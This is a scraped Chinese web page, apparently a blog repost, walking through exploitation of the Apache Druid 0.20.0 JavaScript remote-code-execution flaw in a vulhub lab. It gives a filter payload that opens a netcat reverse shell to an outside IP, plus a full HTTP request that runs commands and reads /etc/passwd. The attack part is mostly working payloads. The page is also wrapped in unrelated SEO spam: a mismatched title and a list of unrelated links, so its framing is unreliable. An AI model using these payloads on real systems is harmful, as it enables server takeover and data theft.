当前位置: 首页 > news >正文

网站后台图片并排怎么做零基础学seo要多久

网站后台图片并排怎么做,零基础学seo要多久,做设计兼职网站,石家庄网站建设哪家好漏洞详情: Apache Druid 是用Java编写的面向列的开源分布式数据存储系统,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid含有能够执行嵌入在各种类型请求中由用户提供的JavaScript代码功能。此功能适用于高度信任环境…

漏洞详情:

Apache Druid 是用Java编写的面向列的开源分布式数据存储系统,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。

Apache Druid含有能够执行嵌入在各种类型请求中由用户提供的JavaScript代码功能。此功能适用于高度信任环境,且默认情况下已禁用。但是,在Druid 0.20.0及更早版本中,经过身份验证用户可以构造传入json串来控制某些参数发送恶意的请求,强制Druid为该请求运行用户提供的JavaScript代码。由于Apache Druid默认情况下缺乏授权认证,攻击者可以利用此漏洞在目标机器上执行任意代码,最终可获取服务器的控制权限。该漏洞源于攻击者可利用恶意JSON输入,通过function参数控制Rhino引擎执行的JavaScript代码,进而调用系统命令

影响范围:

Apache Druid <= 0.20.0

漏洞复现:

pull影响范围内的druid版本镜像

docker pull vulhub/apache-druid:0.20.0

运行容器

docker run --rm -i -p 8888:8888 vulhub/docker-druid:0.20.0

开浏览器访问8888端口 ,无需认证可访问Druid console页面:

上传代码块

 Base directory==》quickstart/tutorial 

File filter==》 wikiticker-2015-09-12-sampled.json.gz

在下面这步开始抓包

 

在这里插入⬇️⬇️⬇️ function代码块

, "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('nc 121.43.48.229 9999 -e /bin/sh')}", "": {"enabled": true}}

上传执行指令

反连shell成功🏅

 

也有现成的poc
POST /druid/indexer/v1/sampler HTTP/1.1
Host: your-ip:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/etc","filter":"passwd"}},"dataSchema":{"dataSource":"test","parser":{"parseSpec":{"format":"javascript","timestampSpec":{},"dimensionsSpec":{},"function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":10}
}
验证结果 
http://www.hrbkazy.com/news/23636.html

相关文章:

  • 响应式网站建站系统长沙网站建站模板
  • 日语网站建设需要注意什么网络营销与市场营销的区别
  • 北京网站建设net2006微信seo排名优化软件
  • 渭南哪家公司可以做网站快照关键词优化
  • 电商网站前端模板如何给公司网站做推广
  • 求网站开发客户扬州整站seo
  • 怎么用sublime做网站长沙网站seo收费
  • 简单网站设计模板数据分析报告
  • 做网站的设计软件短视频平台推广方案
  • 国内校园网站建设网络推广方式方法
  • 外包公司不给交社保怎么办广州seo招聘
  • 搭建wordpress靶机镇江seo公司
  • 搭建新平台seo网络推广是干嘛的
  • 机构改革后政府网站建设方案个人网站源码免费下载
  • wordpress 固定链接 id上海关键词排名优化公司
  • 美橙做过网站案例南昌seo推广公司
  • 西安做门户网站最好的公司关键词排名怎么上首页
  • 织梦网站制作教程重庆网站搜索排名
  • 网站建设自学 优帮云亚马逊的免费网站
  • 有那种做订单的网站吗百度提交入口的注意事项
  • 外贸营销型网站建设百度网盘官网入口
  • 做文员的网站知乎百度公司的业务范围
  • 南水北调中线干线工程建设管理局网站文明seo
  • 合肥专业网站建设网站的营销推广
  • 济南智能网站建设咨询电话百度收录平台
  • 网站标题优化可以含几个关键词零基础seo入门教学
  • 怎么做网站评估网站设计制作一条龙
  • 文章类网站源码优化大师的作用
  • 有没有网站学做总结中国seo网站
  • 做团购的家居网站有哪些足球世界排名一览表